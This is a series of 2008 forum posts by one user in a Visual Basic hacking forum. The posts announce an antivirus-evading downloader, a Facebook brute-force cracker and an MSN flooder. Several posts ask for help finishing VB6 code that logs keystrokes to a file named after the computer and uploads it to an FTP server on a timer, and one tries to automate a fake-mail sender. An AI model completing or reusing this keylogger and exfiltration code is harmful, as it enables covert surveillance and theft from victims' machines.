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1  Programación / Programación Visual Basic / ODESA DOWNLOADER BUILDER [FULL SOURCE] en: 21 Noviembre 2008, 00:52 am
Hi my friends,
I coded an downloader builder with stub.
I tried another way for downloading file, I used inet.Because AV's can't understand its a downloader.I hope you like it.Thx all of elhacker.net users ;)


2  Programación / Programación Visual Basic / Fast File Transfer Method (WINSOCK) en: 31 Octubre 2008, 13:29 pm
Hi Guys,
This code is like a winsock tutorial, it explains how to send files to any ip using winsock.I've assumed that the reader knows only the basics of winsock...so i've explained in it.

Reference Page:



3  Programación / Programación Visual Basic / A question!Build exe please hep me! en: 28 Octubre 2008, 12:27 pm
Hi friends,
My question is that:
I have two source code.And I try to make one program.

Firs source code name is:stub
Second source code name is: Builder

Stub has a text box on form.
Builder has a textbox and a command buton on form.

I get it stub.exe into builder.exe and I wanna make when Builder make a new exe file,  on builder's text box write to stub's text.box!

Example Picture:

How can I make it on vb?
What is example code, please help me!
4  Programación / Programación Visual Basic / Odesa Md5 Hash Maker - Open Source // en: 26 Octubre 2008, 00:12 am

Odesa MD5 maker is a md5 generator... Encrypts the string before hashing it... *NOTE.. This generator wont generate pure MD5 hashes.It uses modules and class modules*

Reference Page:
5  Programación / Programación Visual Basic / Odesa FaceBook Cracker - OPEN SOURCE -Vb 6 en: 22 Octubre 2008, 17:49 pm
Hi guys,
I wrote an facebook cracker, it using brute force and worldlist way.
The source code made by vb6.
Now I share with you.I hope you like it.

'  Special Thanks To All World Hackers
' Special Thanks:

6  Programación / Programación Visual Basic / Timer And Inet Help (Emergency) Wait for vb gurus en: 22 Octubre 2008, 17:11 pm
Hi guys
I have a problem, when I make this I took permission denied error.
I supposed , I can't set of timers intervals.
Please help me , try this code on your vb.
We should make this working thanks, why I get error?
The Timers intervalls must have=?????? sec.
I need your help.

Private Sub Form_Load()
Timer5.Enabled = True
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Do While Inet1.StillExecuting
DoEvents: DoEvents: DoEvents
Inet1.Execute Inet1.URL, "Send d:\" & Date$ & "on.txt " & Date$ & "on.txt"
'Inet1.Execute Inet1.URL, "Send d:\" & Dosyaadi & " " & Dosyaadi
Timer6.Enabled = True
End Sub

Private Sub Timer2_Timer()
'With Inet1
Inet1.Protocol = icFTP
Inet1.URL = "http://ftp://adress.com"
Inet1.Password = "pass"
Inet1.username = "username"
'Inet1.RequestTimeout = 40
'Timer3.Enabled = False
'Timer1.Enabled = True
End Sub

Private Sub Timer3_Timer()

'Dim Dosyaadi As String
'Dim fullyol As String
'Dosyaadi = Environ("Computername") & ".log"
'fullyol = App.Path & "\" & Dosyaadi
'Open Dosyaadi For Append As #1
Open Date$ & "on.txt " For Append As #1
Print #1, Text1.Text
Close #1
Timer4.Enabled = True
'Timer1.Enabled = False

End Sub

Private Sub Timer4_Timer()

Timer3.Enabled = False
Timer1.Enabled = True
End Sub

Private Sub Timer5_Timer()
Timer2.Enabled = True
Timer3.Enabled = True
Timer1.Enabled = False

End Sub

Private Sub Timer6_Timer()
Timer1.Enabled = False
Timer5.Enabled = True
End Sub
7  Programación / Programación Visual Basic / Msn Status Flooder - :D:D:D -OPEN SOURCE en: 22 Octubre 2008, 02:05 am

Odesa Msn Status Flooder - Open Source
Coded By: ODESA
For Using Msn Api's


What is it make?

This code make: changing your msn status to visible and invisible fastest.
So Everybody see your Msn online message windows nonstop

For Understanding Look The Flood.Png

All World Hackers - We Are The Different From Others!

8  Programación / Programación Visual Basic / Necesito su ayuda (con inet) en: 21 Octubre 2008, 14:26 pm
Hola amigos
Hago una bitácora, quiero subir un archivo de registro (con el nombre del equipo) a mi ftp Me escribió un código, pero tomé un error.Mi programa puede crear archivo de registro con el ordenador name.But I No se puede cargar este archivo de registro a mi ftp con el nombre de mi equipo
 error es: Runtype Miss match

Private Sub Timer3_Timer()
Do While Inet1.StillExecuting
DoEvents: DoEvents: DoEvents
Inet1.Execute Inet1.URL, "Send + App.Path + " \ " + computername + .log " & " + computername + .log "
End Sub

¿Dónde está mal?

Thx for help
9  Programación / Programación Visual Basic / Sendkey And Inet Anybody Likes Hardwork?Please Help en: 20 Octubre 2008, 13:22 pm
Hi friends,
I have a question about using inet and senkeys.
Program makes when pressing a,l,p,e,r letters on keyboard,
the program should save this letters on a txt file.and every 15 minutes it should upload this txt files to my ftp.
(note: txt files name is must be computer name for example. cafeplus.txt)
So I need your help my friends If you help me I wanna become very happy.
I try to make something (at down you see)  but code has a lot of missings.
Please help me its my homework.

Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer$, nSize As Long) As Long

Private Sub form_load()
Inet1.URL = "http://ftp://adress.com"
Inet1.RemoteHost = "http://ftp://adress.com"
Inet1.Protocol = icFTP
Inet1.Password = "******"
Inet1.UserName = "******"
Inet1.RequestTimeout = 40
Timer1.Enabled = True
End Sub

Private Sub Timer1_Timer()
Inet1.Execute , "SEND C:\Computername.txt Computername.txt" & vbCrLf
End Sub

10  Programación / Programación Visual Basic / Hi guys I need Your help, about web forms in vb. en: 10 Octubre 2008, 00:34 am
Hi guys,
How are you?I cant speak spanish so I must be write in english.I am sorry for this.
I have a question about using webforms in Vb and I supposed you can answer to me easily.
A few days ago I try to make an anounymous mail sender  program in vb.But I couldn't make it.
I try to use this adress:
'and I use this codes:

Private Sub Command1_Click()
wb.Document.Forms(0).elements(0).Value = Text1.Text
wb.Document.Forms(0).elements(1).Value = Text2.Text
wb.Document.Forms(0).elements(2).Value = Text3.Text
wb.Document.Forms(0).elements(3).Value = Text4.Text
wb.Document.Forms(0).elements(4).Value = Text5.Text
wb.Document.Forms(0).elements(5).Value = Text6.Text
End Sub

Private Sub Form_Load()
wb.Navigate "http://www.fakemailer.info"


But it didn't work, and then I tried other ways."All.item",Document.Form1 as.
But I Couldn't.
Is anybody helpme about this?

I cant use inet, if you make an working example I will became very happy.
Thanks for your help.

                                                                       Best Regards
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